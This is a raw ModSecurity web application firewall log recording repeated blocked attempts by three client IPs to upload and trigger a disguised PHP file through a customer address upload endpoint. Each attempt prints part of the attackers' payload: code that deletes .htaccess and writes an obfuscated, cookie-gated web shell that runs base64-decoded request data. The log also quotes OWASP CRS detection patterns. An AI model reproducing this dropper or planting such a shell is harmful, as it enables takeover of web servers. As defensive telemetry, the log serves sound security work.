[Fri Feb 13 01:03:17.350051 2026] [:error] [pid 2049308] [client 89.239.157.171:44554] [client 89.239.157.171] ModSecurity: Rule 7fef5f307be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/v/sv88364f428d25.phar"] [unique_id "aY5qRUOCa4U_aM11Kcw-KgAAAD8"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 13 01:03:17.350599 2026] [:error] [pid 2049308] [client 89.239.157.171:44554] [client 89.239.157.171] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/v/sv88364f428d25.phar"] [unique_id "aY5qRUOCa4U_aM11Kcw-KgAAAD8"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 13 01:03:17.352984 2026] [:error] [pid 2049308] [client 89.239.157.171:44554] [client 89.239.157.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/v/sv88364f428d25.phar"] [unique_id "aY5qRUOCa4U_aM11Kcw-KgAAAD8"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 13 01:03:17.353190 2026] [:error] [pid 2049308] [client 89.239.157.171:44554] [client 89.239.157.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/v/sv88364f428d25.phar"] [unique_id "aY5qRUOCa4U_aM11Kcw-KgAAAD8"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 13 01:03:17.595316 2026] [:error] [pid 2049308] [client 89.239.157.171:44554] [client 89.239.157.171] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: sv88364f428d25.php8 found within FILES:custom_attributes[country_id]: sv88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aY5qRUOCa4U_aM11Kcw-KwAAAD8"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/s/v/sv88364f428d25.phar
[Fri Feb 13 01:03:17.595945 2026] [:error] [pid 2049308] [client 89.239.157.171:44554] [client 89.239.157.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aY5qRUOCa4U_aM11Kcw-KwAAAD8"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/s/v/sv88364f428d25.phar
[Fri Feb 13 01:03:17.596148 2026] [:error] [pid 2049308] [client 89.239.157.171:44554] [client 89.239.157.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aY5qRUOCa4U_aM11Kcw-KwAAAD8"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/s/v/sv88364f428d25.phar
[Fri Feb 13 01:03:17.785246 2026] [:error] [pid 2049308] [client 89.239.157.171:44554] [client 89.239.157.171] ModSecurity: Rule 7fef5f307be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/v/sv88364f428d25.php8"] [unique_id "aY5qRUOCa4U_aM11Kcw-LAAAAD8"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 13 01:03:17.785685 2026] [:error] [pid 2049308] [client 89.239.157.171:44554] [client 89.239.157.171] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/v/sv88364f428d25.php8"] [unique_id "aY5qRUOCa4U_aM11Kcw-LAAAAD8"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 13 01:03:17.787996 2026] [:error] [pid 2049308] [client 89.239.157.171:44554] [client 89.239.157.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/v/sv88364f428d25.php8"] [unique_id "aY5qRUOCa4U_aM11Kcw-LAAAAD8"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 13 01:03:17.788202 2026] [:error] [pid 2049308] [client 89.239.157.171:44554] [client 89.239.157.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/v/sv88364f428d25.php8"] [unique_id "aY5qRUOCa4U_aM11Kcw-LAAAAD8"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 13 18:32:44.769057 2026] [:error] [pid 2051936] [client 91.84.106.190:44464] [client 91.84.106.190] ModSecurity: Rule 7f42afe02be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/x/3x88364f428d25.phar"] [unique_id "aY9gPB5UNVFKegtLa31bTwAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 13 18:32:44.769564 2026] [:error] [pid 2051936] [client 91.84.106.190:44464] [client 91.84.106.190] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/x/3x88364f428d25.phar"] [unique_id "aY9gPB5UNVFKegtLa31bTwAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 13 18:32:44.771984 2026] [:error] [pid 2051936] [client 91.84.106.190:44464] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/x/3x88364f428d25.phar"] [unique_id "aY9gPB5UNVFKegtLa31bTwAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 13 18:32:44.772165 2026] [:error] [pid 2051936] [client 91.84.106.190:44464] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/x/3x88364f428d25.phar"] [unique_id "aY9gPB5UNVFKegtLa31bTwAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 13 18:32:44.868562 2026] [:error] [pid 2051936] [client 91.84.106.190:44464] [client 91.84.106.190] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 3x88364f428d25.php8 found within FILES:custom_attributes[country_id]: 3x88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aY9gPB5UNVFKegtLa31bUAAAAAY"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/3/x/3x88364f428d25.phar
[Fri Feb 13 18:32:44.869184 2026] [:error] [pid 2051936] [client 91.84.106.190:44464] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aY9gPB5UNVFKegtLa31bUAAAAAY"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/3/x/3x88364f428d25.phar
[Fri Feb 13 18:32:44.869355 2026] [:error] [pid 2051936] [client 91.84.106.190:44464] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aY9gPB5UNVFKegtLa31bUAAAAAY"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/3/x/3x88364f428d25.phar
[Fri Feb 13 18:32:44.971624 2026] [:error] [pid 2051936] [client 91.84.106.190:44464] [client 91.84.106.190] ModSecurity: Rule 7f42afe02be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/x/3x88364f428d25.php8"] [unique_id "aY9gPB5UNVFKegtLa31bUQAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 13 18:32:44.972068 2026] [:error] [pid 2051936] [client 91.84.106.190:44464] [client 91.84.106.190] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/x/3x88364f428d25.php8"] [unique_id "aY9gPB5UNVFKegtLa31bUQAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 13 18:32:44.974514 2026] [:error] [pid 2051936] [client 91.84.106.190:44464] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/x/3x88364f428d25.php8"] [unique_id "aY9gPB5UNVFKegtLa31bUQAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 13 18:32:44.974702 2026] [:error] [pid 2051936] [client 91.84.106.190:44464] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/x/3x88364f428d25.php8"] [unique_id "aY9gPB5UNVFKegtLa31bUQAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 14 12:01:14.339952 2026] [:error] [pid 2074741] [client 185.65.202.110:55492] [client 185.65.202.110] ModSecurity: Rule 7fe1cd33ebe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/t/0t88364f428d25.phar"] [unique_id "aZBV-pFWJBwiiU1SR7xJXgAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 14 12:01:14.340451 2026] [:error] [pid 2074741] [client 185.65.202.110:55492] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/t/0t88364f428d25.phar"] [unique_id "aZBV-pFWJBwiiU1SR7xJXgAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 14 12:01:14.342944 2026] [:error] [pid 2074741] [client 185.65.202.110:55492] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/t/0t88364f428d25.phar"] [unique_id "aZBV-pFWJBwiiU1SR7xJXgAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 14 12:01:14.343125 2026] [:error] [pid 2074741] [client 185.65.202.110:55492] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/t/0t88364f428d25.phar"] [unique_id "aZBV-pFWJBwiiU1SR7xJXgAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 14 12:01:14.508718 2026] [:error] [pid 2074741] [client 185.65.202.110:55492] [client 185.65.202.110] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 0t88364f428d25.php8 found within FILES:custom_attributes[country_id]: 0t88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZBV-pFWJBwiiU1SR7xJXwAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/0/t/0t88364f428d25.phar
[Sat Feb 14 12:01:14.509393 2026] [:error] [pid 2074741] [client 185.65.202.110:55492] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZBV-pFWJBwiiU1SR7xJXwAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/0/t/0t88364f428d25.phar
[Sat Feb 14 12:01:14.509577 2026] [:error] [pid 2074741] [client 185.65.202.110:55492] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZBV-pFWJBwiiU1SR7xJXwAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/0/t/0t88364f428d25.phar
[Sat Feb 14 12:01:14.868525 2026] [:error] [pid 2074741] [client 185.65.202.110:55492] [client 185.65.202.110] ModSecurity: Rule 7fe1cd33ebe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/t/0t88364f428d25.php8"] [unique_id "aZBV-pFWJBwiiU1SR7xJYAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 14 12:01:14.868999 2026] [:error] [pid 2074741] [client 185.65.202.110:55492] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/t/0t88364f428d25.php8"] [unique_id "aZBV-pFWJBwiiU1SR7xJYAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
